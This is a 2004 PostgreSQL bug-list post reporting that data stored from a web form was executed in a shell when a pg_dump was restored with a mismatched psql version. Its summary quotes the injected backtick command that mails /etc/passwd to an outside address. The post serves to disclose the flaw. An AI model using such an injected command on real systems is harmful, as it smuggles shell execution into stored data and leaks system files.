syntax error causes crafted data to be executed in shell - Mailing list pgsql-bugs

From Thomer M. Gil
Subject syntax error causes crafted data to be executed in shell
Date
Msg-id 20041217183802.GA26196@dataloss.thomer.com
Whole thread Raw
Responses Re: syntax error causes crafted data to be executed in shell
List pgsql-bugs
Short summary:

    1.  Someone wrote "`mail blah@blah.com < /etc/passwd`" in a web form;
        this string was stored in a postgresql database.
    2.  We ran pg_dump
    3.  We ran psql (not the same version as pg_dump!)
    4.  blah@blah.com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer

pgsql-bugs by date:

Previous
From: Tom Lane
Date:
Subject: Re: posgresql 8.0 RC1 missing schemas
Next
From: Tom Lane
Date:
Subject: Re: syntax error causes crafted data to be executed in shell